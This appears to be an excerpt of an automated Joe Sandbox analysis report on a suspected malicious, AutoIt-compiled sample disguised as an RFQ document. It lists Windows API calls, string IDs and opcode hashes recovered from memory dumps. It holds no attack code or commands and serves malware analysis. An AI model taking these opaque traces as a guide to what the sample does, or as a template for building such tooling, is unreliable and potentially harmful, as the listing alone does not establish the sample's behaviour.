                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                              • String ID: 0$@U=u$tooltips_class32
                                              • API String ID: 1297703922-1130792468
                                              • Opcode ID: bc9156b5d75d801c97ef11779215d43c8c2216b3d91e313ee348b69a8dad9fcc
                                              • Instruction ID: 0f154057e69b7d633c51ce120e0b099eddcb32f5c7c68e2c845d434666f0b09d
                                              • Opcode Fuzzy Hash: bc9156b5d75d801c97ef11779215d43c8c2216b3d91e313ee348b69a8dad9fcc
                                              • Instruction Fuzzy Hash: DD718971144245AFD720CF28DC49FAA7BE9EF89700F48452CF995A72A1C7B4E962CF12
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • DragQueryPoint.SHELL32(?,?), ref: 0016C917
                                                • Part of subcall function 0016ADF1: ClientToScreen.USER32(?,?), ref: 0016AE1A
                                                • Part of subcall function 0016ADF1: GetWindowRect.USER32(?,?), ref: 0016AE90
                                                • Part of subcall function 0016ADF1: PtInRect.USER32(?,?,0016C304), ref: 0016AEA0
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0016C980
                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0016C98B
                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0016C9AE
                                              • _wcscat.LIBCMT ref: 0016C9DE
                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0016C9F5
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0016CA0E
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0016CA25
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0016CA47
                                              • DragFinish.SHELL32(?), ref: 0016CA4E
                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0016CB41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
                                              • API String ID: 169749273-762882726
                                              • Opcode ID: c1e479065ad92ec378940a64f1ce5c093daac1f34767e6e08c6c8fab8543c329
                                              • Instruction ID: e4397e24b63e68eb8ce36c765f01b93ad29a00c4818b1e872e05e4e406d34603
                                              • Opcode Fuzzy Hash: c1e479065ad92ec378940a64f1ce5c093daac1f34767e6e08c6c8fab8543c329
                                              • Instruction Fuzzy Hash: 34617C71108340AFC701DF65DC85DAFBBE8FF89750F04092EF5A5A21A1DB709A49CBA2
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 001646AB
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001646F6
                                              Strings
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0016BB6E
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00166D80,?), ref: 0016BBCA
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0016BC03
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0016BC46
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0016BC7D
                                              • FreeLibrary.KERNEL32(?), ref: 0016BC89
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0016BC99
                                              • DestroyIcon.USER32(?), ref: 0016BCA8
                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0016BCC5
                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0016BCD1
                                                • Part of subcall function 0010313D: __wcsicmp_l.LIBCMT ref: 001031C6
                                              Strings
                                              Similarity
                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                              • String ID: .dll$.exe$.icl$@U=u
                                              APIs
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                              • CharLowerBuffW.USER32(?,?), ref: 0014A636
                                              • GetDriveTypeW.KERNEL32 ref: 0014A683
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0014A6CB
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0014A702
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0014A730
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                              Strings
                                              Similarity
                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                              APIs
                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0014A47A
                                              • __swprintf.LIBCMT ref: 0014A49C
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0014A4D9
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0014A4FE
                                              • _memset.LIBCMT ref: 0014A51D
                                              • _wcsncpy.LIBCMT ref: 0014A559
                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0014A58E
                                              • CloseHandle.KERNEL32(00000000), ref: 0014A599
                                              • RemoveDirectoryW.KERNEL32(?), ref: 0014A5A2
                                              • CloseHandle.KERNEL32(00000000), ref: 0014A5AC
                                              Strings
                                              Similarity
                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                              • String ID: :$\$\??\%s
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0016C4EC
                                              • GetFocus.USER32 ref: 0016C4FC
                                              • GetDlgCtrlID.USER32(00000000), ref: 0016C507
                                              • _memset.LIBCMT ref: 0016C632
                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0016C65D
                                              • GetMenuItemCount.USER32(?), ref: 0016C67D
                                              • GetMenuItemID.USER32(?,00000000), ref: 0016C690
                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0016C6C4
                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0016C70C
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0016C744
                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0016C779
                                              Strings
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                              • String ID: 0
                                              APIs
                                                • Part of subcall function 0013874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00138766
                                                • Part of subcall function 0013874A: GetLastError.KERNEL32(?,0013822A,?,?,?), ref: 00138770
                                                • Part of subcall function 0013874A: GetProcessHeap.KERNEL32(00000008,?,?,0013822A,?,?,?), ref: 0013877F
                                                • Part of subcall function 0013874A: HeapAlloc.KERNEL32(00000000,?,0013822A,?,?,?), ref: 00138786
                                                • Part of subcall function 0013874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0013879D
                                                • Part of subcall function 001387E7: GetProcessHeap.KERNEL32(00000008,00138240,00000000,00000000,?,00138240,?), ref: 001387F3
                                                • Part of subcall function 001387E7: HeapAlloc.KERNEL32(00000000,?,00138240,?), ref: 001387FA
                                                • Part of subcall function 001387E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00138240,?), ref: 0013880B
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00138458
                                              • _memset.LIBCMT ref: 0013846D
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0013848C
                                              • GetLengthSid.ADVAPI32(?), ref: 0013849D
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 001384DA
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001384F6
                                              • GetLengthSid.ADVAPI32(?), ref: 00138513
                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00138522
                                              • HeapAlloc.KERNEL32(00000000), ref: 00138529
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0013854A
                                              • CopySid.ADVAPI32(00000000), ref: 00138551
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00138582
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001385A8
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001385BC
                                              Similarity
                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                              • String ID:
                                              APIs
                                              • GetDC.USER32(00000000), ref: 001576A2
                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 001576AE
                                              • CreateCompatibleDC.GDI32(?), ref: 001576BA
                                              • SelectObject.GDI32(00000000,?), ref: 001576C7
                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0015771B
                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00157757
                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0015777B
                                              • SelectObject.GDI32(00000006,?), ref: 00157783
                                              • DeleteObject.GDI32(?), ref: 0015778C
                                              • DeleteDC.GDI32(00000006), ref: 00157793
                                              • ReleaseDC.USER32(00000000,?), ref: 0015779E
                                              Strings
                                              Similarity
                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                              • String ID: (
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,0016FB78), ref: 0014A0FC
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 0014A11E
                                              • __swprintf.LIBCMT ref: 0014A177
                                              • __swprintf.LIBCMT ref: 0014A190
                                              • _wprintf.LIBCMT ref: 0014A246
                                              • _wprintf.LIBCMT ref: 0014A264
                                              Strings
                                              Similarity
                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                              APIs
                                              • timeGetTime.WINMM ref: 0014521C
                                                • Part of subcall function 00100719: timeGetTime.WINMM(?,753DB400,000F0FF9), ref: 0010071D
                                              • Sleep.KERNEL32(0000000A), ref: 00145248
                                              • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0014526C
                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0014528E
                                              • SetActiveWindow.USER32 ref: 001452AD
                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001452BB
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 001452DA
                                              • Sleep.KERNEL32(000000FA), ref: 001452E5
                                              • IsWindow.USER32 ref: 001452F1
                                              • EndDialog.USER32(00000000), ref: 00145302
                                              Strings
                                              Similarity
                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                              • String ID: @U=u$BUTTON
                                              APIs
                                                • Part of subcall function 00100B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,000E6C6C,?,00008000), ref: 00100BB7
                                                • Part of subcall function 000E48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000E48A1,?,?,000E37C0,?), ref: 000E48CE
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000E6D0D
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 000E6E5A
                                                • Part of subcall function 000E59CD: _wcscpy.LIBCMT ref: 000E5A05
                                                • Part of subcall function 0010387D: _iswctype.LIBCMT ref: 00103885
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                              • API String ID: 537147316-1018226102
                                              • Opcode ID: 00ff5d90e00a51c856253f4fc36c9e95f290a4e64e2835c4ef6a363e05f71d01
                                              • Instruction ID: 13cfc6f3f183011a5d47f04f41ed53079474b178dc2a720833237265a89a8950
                                              • Opcode Fuzzy Hash: 00ff5d90e00a51c856253f4fc36c9e95f290a4e64e2835c4ef6a363e05f71d01
                                              • Instruction Fuzzy Hash: AC0291301083819FC724EF25C891AAFBBE5BF98354F14492DF4C6A72A2DB71D949CB42
                                              APIs
                                              • _memset.LIBCMT ref: 000E45F9
                                              • GetMenuItemCount.USER32(001A6890), ref: 0011D7CD
                                              • GetMenuItemCount.USER32(001A6890), ref: 0011D87D
                                              • GetCursorPos.USER32(?), ref: 0011D8C1
                                              • SetForegroundWindow.USER32(00000000), ref: 0011D8CA
                                              • TrackPopupMenuEx.USER32(001A6890,00000000,?,00000000,00000000,00000000), ref: 0011D8DD
                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0011D8E9
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                              • String ID:
                                              • API String ID: 2751501086-0
                                              • Opcode ID: 9294e57d0f9c778039489769a9a530f9db4e4231b81abfdc754392d17f0e844e
                                              • Instruction ID: 6856bea90ddc9b66b8ba5134c5c8b75e52883460fc5001e8823ed708484ee50c
                                              • Opcode Fuzzy Hash: 9294e57d0f9c778039489769a9a530f9db4e4231b81abfdc754392d17f0e844e
                                              • Instruction Fuzzy Hash: 46710670600245BEEB249F15EC89FEABF64FF05368F20022AF515661E1C7B15CA0DB95
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00160038,?,?), ref: 001610BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                              • API String ID: 3964851224-909552448
                                              • Opcode ID: 8ef284cd163cbe1fd6761180c29ed286084f0d05b1494e1fb9c6445ecd7c5d77
                                              • Instruction ID: 11b2e28fb28ceb1cecc09c5d4146a5f7673d033f92cea81e2730c9b7ed04cc96
                                              • Opcode Fuzzy Hash: 8ef284cd163cbe1fd6761180c29ed286084f0d05b1494e1fb9c6445ecd7c5d77
                                              • Instruction Fuzzy Hash: 7941743014824E9BCF15EF90EE916EE3725BF25350F584468FD9167292D770AD2AC760
                                              APIs
                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 001677CD
                                              • CreateCompatibleDC.GDI32(00000000), ref: 001677D4
                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 001677E7
                                              • SelectObject.GDI32(00000000,00000000), ref: 001677EF
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 001677FA
                                              • DeleteDC.GDI32(00000000), ref: 00167803
                                              • GetWindowLongW.USER32(?,000000EC), ref: 0016780D
                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00167821
                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0016782D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                              • String ID: @U=u$static
                                              • API String ID: 2559357485-3553413495
                                              • Opcode ID: f04e03a8d7ea5eb7d844497a7701a3d60612986014de50e97f8d34f6b9b279cd
                                              • Instruction ID: 79f4527908e633d90d424cff42b5d5355f97581620a6ac7b5207394828515e31
                                              • Opcode Fuzzy Hash: f04e03a8d7ea5eb7d844497a7701a3d60612986014de50e97f8d34f6b9b279cd
                                              • Instruction Fuzzy Hash: 69317C72105215BBDF119FB4EC09FDA3B69FF09365F114228FA15A60E0CB71D8A2DBA4
                                              APIs
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                                • Part of subcall function 000E7A84: _memmove.LIBCMT ref: 000E7B0D
                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001455D2
                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001455E8
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001455F9
                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0014560B
                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0014561C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: SendString$_memmove
                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                              • API String ID: 2279737902-1007645807
                                              • Opcode ID: 5931def90b32599aab3c96d3826bc6aaf58ffa31d0220f35bf6bf8fd33a2965a
                                              • Instruction ID: 76f92b6b64d9e3d1b851bbe68128382105e1b3d3828bfa083970d00da18b04bd
                                              • Opcode Fuzzy Hash: 5931def90b32599aab3c96d3826bc6aaf58ffa31d0220f35bf6bf8fd33a2965a
                                              • Instruction Fuzzy Hash: B81182209541A97EDB24A662CC5ADFFBB7CFF95B00F840469B405A20D3DFA01E09C5E2
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                              • String ID: 0.0.0.0
                                              • API String ID: 208665112-3771769585
                                              • Opcode ID: 957787d3475cef77b99e34045dbf240424a4823a3ca6a977d2774d97c89c2897
                                              • Instruction ID: 2349b93404ac1e112bb48b19f14421299ceec2ba564b040a06bbfc4c980acca0
                                              • Opcode Fuzzy Hash: 957787d3475cef77b99e34045dbf240424a4823a3ca6a977d2774d97c89c2897
                                              • Instruction Fuzzy Hash: 8B110A31908119AFCB24EB24EC4AFDB77BCEF54715F0401BAF484960A1EFF09AC29691
                                              APIs
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                              • CoInitialize.OLE32(00000000), ref: 0014D855
                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0014D8E8
                                              • SHGetDesktopFolder.SHELL32(?), ref: 0014D8FC
                                              • CoCreateInstance.OLE32(00172D7C,00000000,00000001,0019A89C,?), ref: 0014D948
                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0014D9B7
                                              • CoTaskMemFree.OLE32(?,?), ref: 0014DA0F
                                              • _memset.LIBCMT ref: 0014DA4C
                                              • SHBrowseForFolderW.SHELL32(?), ref: 0014DA88
                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0014DAAB
                                              • CoTaskMemFree.OLE32(00000000), ref: 0014DAB2
                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0014DAE9
                                              • CoUninitialize.OLE32(00000001,00000000), ref: 0014DAEB
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                              • String ID:
                                              • API String ID: 1246142700-0
                                              • Opcode ID: c9bfbd86fe234e81fd33095e1b93ebd4dd1ef9346963cc128ec29c019cebdb5e
                                              • Instruction ID: 24235b1bf890499e4f20aa0324f55a06dcb7f2af14800b9d2f3ef2bf3abb74f5
                                              • Opcode Fuzzy Hash: c9bfbd86fe234e81fd33095e1b93ebd4dd1ef9346963cc128ec29c019cebdb5e
                                              • Instruction Fuzzy Hash: B7B1FB75A00109AFDB04DFA5DC88DAEBBB9FF48314B1484A9F909EB261DB70ED45CB50
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 001405A7
                                              • SetKeyboardState.USER32(?), ref: 00140612
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00140632
                                              • GetKeyState.USER32(000000A0), ref: 00140649
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00140678
                                              • GetKeyState.USER32(000000A1), ref: 00140689
                                              • GetAsyncKeyState.USER32(00000011), ref: 001406B5
                                              • GetKeyState.USER32(00000011), ref: 001406C3
                                              • GetAsyncKeyState.USER32(00000012), ref: 001406EC
                                              • GetKeyState.USER32(00000012), ref: 001406FA
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00140723
                                              • GetKeyState.USER32(0000005B), ref: 00140731
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: 2474afc925c8c442454572d5704e903237c715bf98a09f0786fe824fece2304c
                                              • Instruction ID: b8edb922be98b1141eb0a33f7555ef0e90fac7207db81f34b729aeb45dd772c5
                                              • Opcode Fuzzy Hash: 2474afc925c8c442454572d5704e903237c715bf98a09f0786fe824fece2304c
